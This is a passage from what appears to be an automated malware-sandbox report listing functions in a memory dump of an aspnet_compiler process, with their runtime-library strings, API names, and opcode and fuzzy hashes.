                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AF22FC
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-871070163
                                                              • Opcode ID: b0b9cd6cc165c2ee08e8a49b7af78c61d54ec469860afd4f9771e73e4251eee3
                                                              • Instruction ID: 1c64a6399c67a7217dba766b7077c61cc6a21142cb9af6a39e831fdd07d6d841
                                                              • Opcode Fuzzy Hash: b0b9cd6cc165c2ee08e8a49b7af78c61d54ec469860afd4f9771e73e4251eee3
                                                              • Instruction Fuzzy Hash: EB51F6726006056BDF119B79CD91FE673ECAF58364F104229FE19DF282EA61ED418790
                                                              Function 00ABEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AF248D
                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AF24BD
                                                              • RTL: Re-Waiting, xrefs: 00AF24FA
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                              • API String ID: 0-3177188983
                                                              • Opcode ID: 27fba4ae548a037b73e865cb819be9cde5506b0eea98ab5c864d63e242ad458b
                                                              • Instruction ID: 0545e49a600cd9bb50c92c43cec56351fcd6989edde003c6456845726e4102a9
                                                              • Opcode Fuzzy Hash: 27fba4ae548a037b73e865cb819be9cde5506b0eea98ab5c864d63e242ad458b
                                                              • Instruction Fuzzy Hash: DE41D771600204AFCB20DFA8CD85FAA77B8EF45720F208615F6599B2C2D774E9418761
                                                              Function 00ACFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID:
                                                              • API String ID: 3965848254-0
                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction ID: d2eb26b27b49af0159d810e00b61aa7701485f9467295a054719b86b94da14f4
                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction Fuzzy Hash: A6917E31E0024AEFDF28CF98C845BAEB7B6EF55305F25807EE511A7162E7305A41DB91
                                                              Function 00B45CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: $$0
                                                              • API String ID: 1302938615-389342756
                                                              • Opcode ID: e7997cd59e71b0a92e4dc41a8657228f8e1c2f69445a3566e30636193989ae99
                                                              • Instruction ID: 2ac0b9d803682f9727cbb3121e0697472e433bd7217c3eda1f06812460d1f744
                                                              • Opcode Fuzzy Hash: e7997cd59e71b0a92e4dc41a8657228f8e1c2f69445a3566e30636193989ae99
                                                              • Instruction Fuzzy Hash: 16918970D44E9AAFDF348FA888446EDBBF0EF01310F1446EAD8A1A7292C3744B45EB51
                                                              Function 00ABB7D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00A8FAE8: LdrInitializeThunk.NTDLL ref: 00A8FAF3
                                                              • __aullrem.LIBCMT ref: 00ABB816
                                                              • __aullrem.LIBCMT ref: 00ABB83D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: __aullrem$InitializeThunk
                                                              • String ID: dt8E
                                                              • API String ID: 241165383-3620828704
                                                              • Opcode ID: 8403f686d35b06d7e684bfa05790b30e23e72fce207f16fbe57a2cd97ad2042f
                                                              • Instruction ID: 33324e0ee25c15ce49b0a7847214591e414df7193a2f7c6cf619a8826f386213
                                                              • Opcode Fuzzy Hash: 8403f686d35b06d7e684bfa05790b30e23e72fce207f16fbe57a2cd97ad2042f
                                                              • Instruction Fuzzy Hash: 5B01DDB2A04204BFFB14D794DD5AFDF77ADDB81354F210115B211EB1C2E6B49D408364